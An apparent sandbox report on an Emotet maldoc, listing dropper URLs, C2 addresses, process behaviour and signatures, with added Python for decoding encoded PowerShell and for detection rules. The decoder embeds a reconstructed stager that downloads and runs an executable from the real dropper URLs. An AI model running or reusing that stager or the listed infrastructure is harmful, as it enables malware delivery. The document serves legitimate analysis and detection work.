ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839

General
Target

ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839

Filesize

N/A

Completed

24-12-2019 23:22

Score
10 /10
SHA256

ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839

Malware Config

Extracted

Language ps1
Source
URLs
exe.dropper

https://www.spectaglobal.com/wp-admin/SELFt1969/

exe.dropper

http://www.emir-elbahr.com/wp-admin/css/1u8825/

exe.dropper

https://www.jwtrubber.com/wp-content/73LYb/

exe.dropper

https://adanzyeyapi.com/wp-includes/dD6121/

exe.dropper

https://www.smartwebdns.net/_vti_bin/0QRGg70/

Extracted

Family emotet
C2

177.180.115.224:80

177.242.21.126:80

190.210.236.139:80

144.217.117.207:8080

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

5.88.27.67:8080

37.187.6.63:8080

186.15.83.52:8080

201.213.32.59:80

97.81.12.153:80

178.79.163.131:8080

138.68.106.4:7080

217.199.160.224:8080

181.61.143.177:80

189.19.81.181:443

186.68.48.204:443

118.36.70.245:80

80.11.158.65:8080

68.187.160.28:443

116.48.138.115:80

190.161.180.184:80

200.123.183.137:443

159.203.204.126:8080

85.152.208.146:80

151.237.36.220:80

96.61.113.203:80

191.103.76.34:443

2.139.158.136:443

163.172.40.218:7080

83.248.141.198:80

46.101.212.195:8080

2.44.167.52:80

46.28.111.142:7080

142.93.114.137:8080

181.231.220.232:80

74.59.187.94:80

139.162.118.88:8080

93.67.154.252:443

203.25.159.3:8080

202.62.39.111:80

109.169.86.13:8080

142.127.57.63:8080

5.196.35.138:7080

37.120.185.153:443

96.38.234.10:80

83.165.78.227:80

181.198.203.45:443

2.45.112.134:80

rsa_pubkey.plain
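The five exe.dropper URLs above were extracted from the PowerShell stager (Language ps1) that the document's macro runs as `Powershell -w hidden -en ...`. The `-en` (EncodedCommand) argument is base64 over the UTF-16LE bytes of the script, not UTF-8, so the first triage step on a sample like this is decoding that argument and pulling the URL list out of it. The Python below is an added example and is not code from the sandbox or from this report: the stager text it encodes is constructed here to match what the report shows (a download to C:\Users\Admin\73.exe followed by execution), and its `@` delimiter, size check and loop shape are assumptions rather than a reproduction of the real payload. Only the URLs are taken from the page.

```python
import base64
import re

# Constructed stand-in for the PowerShell stager the sandbox ran (the real
# "-en" argument is not reproduced on this page). It carries the five
# exe.dropper URLs from the extracted config; the '@' delimiter, the size
# check and the download loop are ASSUMED, the URLs are the report's.
CONSTRUCTED_STAGER = (
    "$u='https://www.spectaglobal.com/wp-admin/SELFt1969/@"
    "http://www.emir-elbahr.com/wp-admin/css/1u8825/@"
    "https://www.jwtrubber.com/wp-content/73LYb/@"
    "https://adanzyeyapi.com/wp-includes/dD6121/@"
    "https://www.smartwebdns.net/_vti_bin/0QRGg70/'.Split('@');"
    "$d=$env:USERPROFILE+'\\73.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$d);"
    "if((Get-Item $d).Length -ge 40000){Start-Process $d;break}}catch{}}"
)

# '@' is excluded from the URL character class because it is the usual
# separator inside these payload lists; quotes and ';' end the literal.
URL_RE = re.compile(r"""https?://[^\s'"@;)(]+""", re.IGNORECASE)


def encode_command(script: str) -> str:
    """Build a -EncodedCommand value the way PowerShell expects it:
    base64 over the UTF-16LE bytes of the script, not over UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(arg: str) -> str:
    """Reverse of encode_command. Restores base64 padding that logs often
    strip and drops a UTF-16 BOM if the encoder prepended one."""
    arg = "".join(arg.split())          # tolerate wrapped or space-split input
    arg += "=" * (-len(arg) % 4)
    raw = base64.b64decode(arg)
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    return raw.decode("utf-16-le")


def extract_urls(script: str) -> list:
    """Every http(s) URL in a decoded stager, in order, deduplicated."""
    urls = []
    for m in URL_RE.finditer(script):
        if m.group(0) not in urls:
            urls.append(m.group(0))
    return urls


def extract_urls_from_encoded(arg: str) -> list:
    """Decode a -en/-EncodedCommand argument and list the URLs it carries."""
    return extract_urls(decode_encoded_command(arg))


if __name__ == "__main__":
    enc = encode_command(CONSTRUCTED_STAGER)
    print("Powershell -w hidden -en " + enc[:48] + "...")
    for url in extract_urls_from_encoded(enc):
        print("exe.dropper", url)
```

On a real sample, pass the `-en` argument captured from the process command line to `extract_urls_from_encoded`. Note that the emotet C2 list above comes from the configuration of the second-stage executable, not from this script: decoding the stager yields the distribution URLs only.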
Signatures 12

Discovery
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pid   process
    4840  WINWORD.EXE
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE, 73.exe, 73.exe

    Reported IOCs

    pid   process
    4840  WINWORD.EXE
    4628  73.exe
    3800  73.exe
  • Suspicious use of FindShellTrayWindow
    WINWORD.EXE

    Reported IOCs

    pid   process
    4840  WINWORD.EXE
  • Suspicious behavior: EnumeratesProcesses
    Powershell.exe

    Reported IOCs

    pid   process
    4468  Powershell.exe
  • Suspicious behavior: EmotetMutantsSpam
    73.exe

    Reported IOCs

    pid   process
    3800  73.exe
  • Enumerates system info in registry

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description        ioc
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
  • Process spawned unexpected child process
    Powershell.exe

    Reported IOCs

    description                                                                         pid   pid_target  process         target process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  4468  4220        Powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    Powershell.exe

    Reported IOCs

    description              pid   process
    Token: SeDebugPrivilege  4468  Powershell.exe
  • Suspicious use of WriteProcessMemory
    Powershell.exe, 73.exe

    Reported IOCs

    description                       pid   process         target process
    PID 4468 wrote to memory of 4628  4468  Powershell.exe  73.exe
    PID 4628 wrote to memory of 3800  4628  73.exe          73.exe
  • Executes dropped EXE
    73.exe, 73.exe

    Reported IOCs

    pid   process
    4628  73.exe
    3800  73.exe
  • Checks processor information in registry

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description        ioc
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  • Emotet

    Description

    Emotet is a trojan that is primarily spread through spam emails.

Processes 4
  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839.doc" /o ""
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of FindShellTrayWindow
    PID:4840
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en [encoded command omitted]
    Suspicious behavior: EnumeratesProcesses
    Process spawned unexpected child process
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    PID:4468
    • C:\Users\Admin\73.exe
      "C:\Users\Admin\73.exe"
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      Executes dropped EXE
      PID:4628
      • C:\Users\Admin\73.exe
        --54dcd426
        Suspicious use of SetWindowsHookEx
        Suspicious behavior: EmotetMutantsSpam
        Executes dropped EXE
        PID:3800
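The tree above is the part of the report that matters for detection engineering: Powershell.exe (PID 4468) is not a child of WINWORD.EXE but of wmiprvse.exe, which is exactly what the "Process spawned unexpected child process" signature records. That parent is consistent with the macro launching the stager through WMI rather than directly, and a rule that only looks for Office spawning PowerShell will miss it. The Python below is an added example, not part of the report: it builds Sysmon-style process-creation events that reproduce this tree (the wmiprvse.exe event, the parent PIDs of WINWORD and wmiprvse, and the placeholder standing in for the omitted encoded command are all assumptions) and runs a small rule set over them to show which rules fire on this chain and which one the WMI hop evades.

```python
import ntpath
import re

HASH = "ecc9db7e20004a8efd97edf7ccfbae92d66f42ca1d99ec8f7ef71e0131a96839"

# Constructed process-creation events (Sysmon Event ID 1 shape) reproducing
# the tree in this report. Images, PIDs and command lines for WINWORD,
# Powershell and 73.exe are the report's. ASSUMED: the wmiprvse.exe event
# (4220, the second pid in the signature row, is taken to be its pid), the
# parent pids 1000 and 700, and the placeholder for the omitted command.
EVENTS = [
    {"pid": 4840, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n '
                + r'"C:\Users\Admin\AppData\Local\Temp' + "\\" + HASH + r'.doc" /o ""'},
    {"pid": 4220, "ppid": 700,
     "image": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "cmdline": "wmiprvse.exe"},
    {"pid": 4468, "ppid": 4220,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe",
     "cmdline": "Powershell -w hidden -en <encoded-command-omitted>"},
    {"pid": 4628, "ppid": 4468,
     "image": r"C:\Users\Admin\73.exe",
     "cmdline": r'"C:\Users\Admin\73.exe"'},
    {"pid": 3800, "ppid": 4628,
     "image": r"C:\Users\Admin\73.exe",
     "cmdline": "--54dcd426"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
          "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b")
ENCODED_RE = re.compile(r"(?i)-e(?:ncodedcommand|nc|n)?\s+\S")
# An .exe sitting directly in a user profile root, as 73.exe does here.
USER_EXE_RE = re.compile(r"(?i)^c:\\users\\[^\\]+\\[^\\]+\.exe$")


def base(image: str) -> str:
    return ntpath.basename(image).lower()


def index(events):
    return {e["pid"]: e for e in events}


def ancestry(events, pid):
    """Image basenames from the process up to the last ancestor we have an event for."""
    by_pid = index(events)
    chain = []
    while pid in by_pid:
        chain.append(base(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Run the rules over every event; returns (rule, pid) pairs in event order."""
    by_pid = index(events)
    alerts = []
    for e in events:
        child = base(e["image"])
        parent_ev = by_pid.get(e["ppid"])
        parent = base(parent_ev["image"]) if parent_ev else ""
        # 1. The classic rule: an Office binary directly launching a script host.
        if parent in OFFICE and child in SHELLS:
            alerts.append(("office_spawns_shell", e["pid"]))
        # 2. Script host whose parent is the WMI provider host. This is what the
        #    sandbox flagged: the WMI hop breaks the Office parent link rule 1 needs.
        if parent == "wmiprvse.exe" and child in SHELLS:
            alerts.append(("wmiprvse_spawns_shell", e["pid"]))
        # 3. Hidden window plus encoded command on the PowerShell command line.
        if child in POWERSHELL and HIDDEN_RE.search(e["cmdline"]) \
                and ENCODED_RE.search(e["cmdline"]):
            alerts.append(("hidden_encoded_powershell", e["pid"]))
        # 4. PowerShell launching an executable dropped into a user profile root.
        if parent in POWERSHELL and USER_EXE_RE.match(e["image"]):
            alerts.append(("dropped_exe_from_powershell", e["pid"]))
        # 5. A binary re-launching its own image with a bare switch argument
        #    (the --54dcd426 re-execution of 73.exe in the tree above).
        if parent_ev and parent_ev["image"].lower() == e["image"].lower() \
                and e["cmdline"].startswith("--"):
            alerts.append(("self_reexec_with_switch", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:28s} pid={pid} chain={' <- '.join(ancestry(EVENTS, pid))}")
```

Rule 1 never fires on this chain even though a macro was the cause, while rules 2 to 5 pick up each later step. In practice keep the parent-based rules and the command-line rules together: the WMI hop changes the parent of PowerShell but not its `-w hidden -en` command line, and not the drop-and-execute path that follows.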
Network
MITRE ATT&CK Matrix
Tactic columns: Collection, Command and Control, Credential Access, Defense Evasion, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation
Downloads
  • C:\Users\Admin\73.exe
  • C:\Users\Admin\73.exe
  • C:\Users\Admin\73.exe
  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
  • memory/3800-12-0x0000000002170000-0x0000000002187000-memory.dmp
  • memory/3800-13-0x0000000000400000-0x00000000004AA000-memory.dmp
  • memory/4628-9-0x00000000022D0000-0x00000000022E7000-memory.dmp
  • memory/4840-2-0x000002189F520000-0x000002189F524000-memory.dmp